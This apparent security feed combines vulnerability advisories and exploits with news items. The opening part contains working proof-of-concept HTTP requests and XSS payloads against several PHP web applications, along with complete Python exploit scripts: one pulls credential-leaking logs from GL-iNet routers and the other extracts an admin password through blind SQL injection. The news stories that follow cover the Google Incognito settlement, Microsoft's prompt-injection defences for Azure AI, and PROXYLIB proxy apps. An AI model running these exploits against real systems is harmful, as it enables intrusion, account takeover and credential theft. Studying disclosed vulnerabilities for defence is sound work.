Computer Laboratory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3140

# Vulnerable code section:

foreach($_POST as $k => $v){  
    $v = $this->conn->real_escape_string($v);  
    if(in_array($k, $main_field)){  
        if(!empty($data)) $data .= ", ";  
        $data .= " `{$k}` = '{$v}' ";  
    }  
}

- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

# Vulnerability Description:

- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571  
Content-Length: 946  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="id"

8  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="firstname"

staff2  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="middlename"

<script>alert(1)</script>  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="lastname"

asd  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="username"

staff  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="password"

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

-----------------------------381104392340117332004262429571--

- In this POST request, an attacker has included a script tag in the "middlename" field:

<script>alert(1)</script>

- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.

# Impact:

- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/xss_1.md  
https://vuldb.com/?id.258915  
https://www.cve.org/CVERecord?id=CVE-2024-3140

Computer Laboratory Management System 1.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3139

# Vulnerable code section:

if(!empty($_FILES['img']['tmp_name'])){  
    if(!is_dir(base_app."uploads/avatars"))  
        mkdir(base_app."uploads/avatars");  
    $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);  
    $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path  
    // Rest of the code  
}

# Vulnerability Description:

This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024  
Content-Length: 8393  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="id"

7  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="firstname"

testtt  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="middlename"

testMiddle   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="lastname"

te Last Name   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="username"

admin2  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="password"

qwe123  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="img"; filename="hack.png"  
Content-Type: image/png

PNG  
...

- Response:

HTTP/1.1 200 OK  
Date: Mon, 01 Apr 2024 10:19:19 GMT  
Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev  
X-Powered-By: PHP/8.2.0  
X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Connection: close  
Content-Type: text/html; charset=UTF-8

1

# Impact:

This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md  
https://vuldb.com/?id.258914  
https://www.cve.org/CVERecord?id=CVE-2024-3139

Computer Laboratory Management System 1.0 Insecure Direct Object Reference

Hospital Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://code-projects.org# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/# Version: v1.0# Tested on: Windows 10# CVE : CVE-2024-29412# Description: Stored Cross Site Scripting vulnerability inHospital Management System - v1.0 allows an attacker to execute arbitrarycode via a crafted payload to the 'patient_id','first_name','middle_initial' ,'last_name'" in /receptionist.php component.# POC:1. Go to the User Login page: "http://localhost/HospitalManagementSystem-gh-pages/2. Login with "r1" ID which is redirected to "http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"endpoint.3. In Patient information functionality add this payload"><script>alert('1')</script> ,in all parameter.4. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

Hospital Management System 1.0 Cross Site Scripting

E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html# Version: v1.0# Tested on: Windows 10# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -v1.0 allows an attacker to execute arbitrary code via a crafted payload tothe Firstname and lastname parameter in the profile component.# POC:1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile2. In fname & lname parameter add payolad"><script>alert("Hacked_by_Sandy")</script>3. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

E-Insurance 1.0 Cross Site Scripting

GL-iNet MT6000 version 4.5.5 suffers from an arbitrary file download vulnerability.

    # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download# CVE: CVE-2024-27356# Google Dork: intitle:"GL.iNet Admin Panel"# Date: 2/26/2024# Exploit Author: Bandar Alharbi (aggressor)# Vendor Homepage: www.gl-inet.com# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin# Tested Model: GL-X3000 Spitz AX# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.mdimport sysimport requestsimport jsonrequests.packages.urllib3.disable_warnings()h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}def DoesTarExist():    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)    if r.status_code == 200:        f = open("logread.tar", "wb")        f.write(r.content)        f.close()        print("[*] Full logs archive `logread.tar` has been downloaded!")        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")        return True    else:        print("[*] The `logread.tar` archive does not exist however ... try again later!")        return Falsedef isVulnerable():    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)    if r1.status_code == 500 and "nginx" in r1.text:        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)        if  "Admin-Token" in r2.text:            j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)            ver = r3.json()['result']['firmware_version']            model = r3.json()['result']['model']            if ver.startswith(('4.')):                print("[*] Firmware version (%s) is vulnerable!" %ver)                print("[*] Device model is: %s" %model)                return True    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")    return Falsedef isAlive():    try:        r = requests.get(url, verify=False, timeout=30, headers=h)        if r.status_code != 200:            print("[*] Make sure the target's web interface is accessible!")            return False        elif r.status_code == 200:            print("[*] The target is reachable!")            return True    except Exception:        print("[*] Error occurred when connecting to the target!")        pass    return Falseif __name__ == '__main__':    if len(sys.argv) != 2:        print("exploit.py url")        sys.exit(0)    url = sys.argv[1]    url = url.lower()    if not url.startswith(('http://', 'https://')):        print("[*] Invalid url format! It should be http[s]://<domain or ip>")        sys.exit(0)    if url.endswith("/"):        url = url.rstrip("/")    print("[*] GL.iNet Unauthenticated Full Logs Downloader")    try:        if (isAlive() and isVulnerable()) == (True and True):            DoesTarExist()    except KeyboardInterrupt:        print("[*] The exploit has been stopped by the user!")        sys.exit(0)

GL-iNet MT6000 4.5.5 Arbitrary File Download

Online Hotel Booking in PHP version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)# Google Dork: n/a# Date: 04/02/2024# Exploit Author: Gian Paris C. Agsam# Vendor Homepage: https://github.com/projectworldsofficial# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip# Version: 1.0# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12# CVE : n/aimport requestsimport argparsefrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITErequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')parser.add_argument('-u', '--url', help='')args = parser.parse_args()def banner():    print(f"""{FR}      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄  ▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██  ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██  ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•         Github: https://github.com/offensive-droid         {FW}    """)# Define the characters to testchars = [    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',    '8', '9', '@', '#']def sqliPayload(char, position, userid, column, table):    sqli = 'admin\' UNION SELECT IF(SUBSTRING('    sqli += str(column) + ','    sqli += str(position) + ',1) = \''    sqli += str(char) + '\',sleep(3),null) FROM '    sqli += str(table) + ' WHERE uname="admin"\''    return sqlidef postRequest(URL, sqliReq, char, position):    sqliURL = URL    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)    if req.elapsed.total_seconds() >= 2:        print("{} : {}".format(char, req.elapsed.total_seconds()))        return char    return ''def theHarvester(target, CHARS, url):    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))    print("Retrieving admin password".format(target['table'], target['column'], target['id']))    position = 1    full_pass = ""    while position < 5:        for char in CHARS:            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])            found_char = postRequest(url, sqliReq, char, position)            full_pass += found_char        position += 1    return full_passif __name__ == "__main__":    banner()    HOST = str(args.url)    PATH = HOST + "/hotel booking/admin/login.php"    adminPassword = {"id": "1", "table": "manager", "column": "upass"}    adminPass = theHarvester(adminPassword, chars, PATH)    print("Admin Password:", adminPass)

Online Hotel Booking In PHP 1.0 SQL Injection

Google has agreed to purge billions of data records reflecting users' browsing activities to settle a class action lawsuit that claimed the search giant tracked them without their knowledge or consent in its Chrome browser.
The class action, filed in 2020, alleged the company misled users by tracking their internet browsing activity who thought that it remained private when using the "

Google to Delete Billions of Browsing Records in 'Incognito Mode' Privacy Lawsuit Settlement

Microsoft adds tools to protect Azure AI from threats such as prompt injection, as well as to give developers the capabilities to ensure generative AI apps are more resilient to model and content manipulation attacks.

Source: Tada Images via Shutterstock

Microsoft has announced several new capabilities in Azure AI Studio that the company says should help developers build generative artificial intelligence (GenAI) apps that are more reliable and resilient against malicious model manipulation and other emerging threats.

In a March 29 blog post, Microsoft's chief product officer of responsible AI, Sarah Bird, pointed to growing concerns about threat actors using prompt injection attacks to get AI systems to behave in dangerous and unexpected ways as the primary driving factor for the new tools.

"Organizations are also concerned about quality and reliability," Bird said. "They want to ensure that their AI systems are not generating errors or adding information that isn’t substantiated in the application’s data sources, which can erode user trust."

Azure AI Studio is a hosted platform that organizations can use to build custom AI assistants, copilots, bots, search tools and other applications, grounded in their own data. Announced in November, the platform hosts Microsoft's machine learning models, as well as models from several other sources, including OpenAI, Meta, Hugging Face, and Nvidia. It allows developers to quickly integrate multimodal capabilities and responsible AI features into their models.

Other major players, such as Amazon and Google, have rushed to market with similar offerings over the past year to tap into the surging interest in AI technologies worldwide. A recent IBM-commissioned study found that 42% of organizations with more than 1,000 employees are already actively using AI in some fashion, with many of them planning to increase and accelerate investments in the technology over the next few years. And not all of them were telling IT beforehand about their AI use.

**Protecting Against Prompt Engineering**

The five new capabilities that Microsoft has added — or will soon add — to Azure AI Studio are Prompt Shields, groundedness detection, safety system messages, safety evaluations, and risk and safety monitoring. The features are designed to address some significant challenges that researchers have uncovered recently — and continue to uncover on a routine basis — with regard to the use of large language models (LLMs) and GenAI tools.

Prompt Shields, for instance, is Microsoft's mitigation for what are known as indirect prompt attacks and jailbreaks. The feature builds on existing mitigations in Azure AI Studio against jailbreak risk. In prompt-engineering attacks, adversaries use prompts that appear innocuous and not overtly harmful to try and steer an AI model into generating harmful and undesirable responses. Prompt engineering is among the most dangerous in a growing class of attacks that try to jailbreak AI models or get them to behave in a manner that is inconsistent with any filters and constraints that developers might have built into them.  

Researchers have recently shown how adversaries can engage in prompt-engineering attacks to get GenAI models to spill their training data, spew out personal information, generate misinformation, and potentially harmful content, such as instructions on how to hot-wire a car.

With Prompt Shields, developers can integrate capabilities into their models that help distinguish between valid and potentially untrustworthy system inputs, set delimiters to help mark the beginning and end of input text, and use data marking to mark input texts. Prompt Shields is currently available in preview mode in Azure AI Content Safety and will become generally available soon, according to Microsoft.

**Mitigations for Model Hallucinations and Harmful Content**

With groundedness detection, Microsoft has added a feature to Azure AI Studio that it says can help developers reduce the risk of their AI models "hallucinating." Model hallucination is a tendency by AI models to generate results that appear plausible but are completely made up and not based — or grounded — on the training data. LLM hallucinations can be hugely problematic if an organization were to take the output as factual and act on it in some way. In a software development environment, for instance, LLM hallucinations could result in developers potentially introducing vulnerable code into their applications.

Azure AI Studio's new groundedness-detection capability is basically about helping detect — more reliably and at greater scale — potentially ungrounded GenAI outputs.  The goal is to give developers a way to test their AI models against what Microsoft calls "groundedness metrics" before deploying the model into their products. The feature also highlights potentially ungrounded statements in LLM outputs, so users know to fact check the output before using it. Groundedness detection should be available in the near future, according to Microsoft.

The new system message framework offers a way for developers to clearly define their models' capabilities, profile, and limitations in their specific environments. Developers can use the capability to define the format of the output and provide examples of intended behavior, so it becomes easier for users to detect deviations from intended behavior. The feature isn't available yet but should be soon.

Azure AI Studio's newly announced safety evaluations capability and its risk and safety monitoring feature are both currently available in preview status. Organizations can use the former to assess the vulnerability of their LLM models to jailbreak attacks and generate unexpected content. The risk and safety monitoring capability allows developers to detect model inputs that are problematic and likely to trigger hallucinated or unexpected content, so they can implement mitigations against it.

"Generative AI can be a force multiplier for every department, company, and industry," Microsoft's Bird said. "At the same time, foundation models introduce new challenges for security and safety that require novel mitigations and continuous learning."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Microsoft Beefs Up Defenses in Azure AI

To settle a years-long lawsuit, Google has agreed to delete “billions of data records” collected from users of “Incognito mode,” illuminating the pitfalls of relying on Chrome to protect your privacy.

If you still hold any notion that Google Chrome’s “Incognito mode” is a good way to protect your privacy online, now’s a good time to stop.

Google has agreed to delete “billions of data records” the company collected while users browsed the web using Incognito mode, according to documents filed in federal court in San Francisco on Monday. The agreement, part of a settlement in a class action lawsuit filed in 2020, caps off years of disclosures about Google’s practices that shed light on how much data the tech giant siphons from its users—even when they’re in private-browsing mode.

Under the terms of the settlement, Google must further update the Incognito mode “splash page” that appears anytime you open an Incognito mode Chrome window after previously updating it in January. The Incognito splash page will explicitly state that Google collects data from third-party websites “regardless of which browsing or browser mode you use,” and stipulate that “third-party sites and apps that integrate our services may still share information with Google,” among other changes. Details about Google’s private-browsing data collection must also appear in the company’s privacy policy.

Additionally, some of the data that Google previously collected on Incognito users will be deleted. This includes “private-browsing data” that is “older than nine months” from the date that Google signed the term sheet of the settlement last December, as well as private-browsing data collected throughout December 2023. Certain documents in the case referring to Google's data collection methods remain sealed, however, making it difficult to assess how thorough the deletion process will be.

Google spokesperson Jose Castaneda says in a statement that the company “is happy to delete old technical data that was never associated with an individual and was never used for any form of personalization.” Castaneda also noted that the company will now pay “zero” dollars as part of the settlement after earlier facing a $5 billion penalty.

Other steps Google must take will include continuing to “block third-party cookies within Incognito mode for five years,” partially redacting IP addresses to prevent re-identification of anonymized user data, and removing certain header information that can currently be used to identify users with Incognito mode active.

The data-deletion portion of the settlement agreement follows preemptive changes to Google’s Incognito mode data collection and the ways it describes what Incognito mode does. For nearly four years, Google has been phasing out third-party cookies, which the company says it plans to completely block by the end of 2024. Google also updated Chrome’s Incognito mode “splash page” in January with weaker language to signify that using Incognito is not “private,” but merely “more private” than not using it.

The settlement's relief is strictly “injunctive,” meaning its central purpose is to put an end to Google activities that the plaintiffs claim are unlawful. The settlement does not rule out any future claims—_The Wall Street Journal_ reports that the plaintiffs’ attorneys had filed at least 50 such lawsuits in California on Monday—though the plaintiffs note that monetary relief in privacy cases is far more difficult to obtain. The important thing, the plaintiffs’ lawyers argue, is effecting changes at Google now that will provide the greatest, immediate benefit to the largest number of users.

Critics of Incognito, a staple of the Chrome browser since 2008, say that, at best, the protections it offers fall flat in the face of the sophisticated commercial surveillance bearing down on most users today; at worst, they say, the feature fills people with a false sense of security, helping companies like Google passively monitor millions of users who've been duped into thinking they're browsing alone.

The Incognito Mode Myth Has Fully Unraveled

Researchers have uncovered a campaign that turns Android phones into proxy nodes for malicious purposes.

Researchers at HUMAN’s Satori Threat Intelligence have discovered a disturbing number of VPN apps that turn users’ devices into proxies for cybercriminals without their knowledge, as part of a camapign called PROXYLIB.

Cybercriminals and state actors like to send their traffic through other people’s devices, known as proxies. This allows them to use somebody else’s resources to get their work done, it masks the origin of their attacks so they are less likely to get blocked, and it makes it easy for them to keep operating if one of their proxies is blocked.

An entire underground market of proxy networks exists to service this desire, offering cybercriminals flexible, scalable platfroms from which to launch activities like advertising fraud, password spraying, and credential stuffing attacks.

The researchers at HUMAN found 28 apps on Google Play that turned unsuspecting Android devices into proxies for criminals. 17 of the apps were free VPNs. All of them have now been removed from Google Play.

The operation was dubbed PROXYLIB after a code library shared by all the apps that was responsible for enrolling devices into the ciminal network.

HUMAN also found hundreds of apps in third-party repositories that appeared to use the LumiApps toolkit, a Software Development Kit (SDK) which can be used to load PROXYLIB. They also tied PROXYLIB to another platform that specializes in selling access to proxy nodes, called Asocks.

**Protection and removal**

Android users are now automatically protected from the PROXYLIB attack by Google Play Protect, which is on by default on Android devices with Google Play Services.

The affected apps can be uninstalled using a mobile device’s uninstall functionality. However, apps like these may be made available under different names in future, which is where apps like Malwarebytes for Android can help.

Recommendations to stay clear of PROXYLIB are:

*   Do not install apps from third-party websites.
*   Do not install free VPNs.
*   Use Malwarebytes for Android.

Victims of novel attacks like PROXYLIB might notice slow traffic, because their bandwidth is in use for other purposes. And at some point their IP address may be blocked by websites and other services.

The researchers included a list of applications they uncovered as part of PROXYLIB. If you installed any of the apps on the list before they were removed from Google Play you will need to uninstall them.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Tag

#google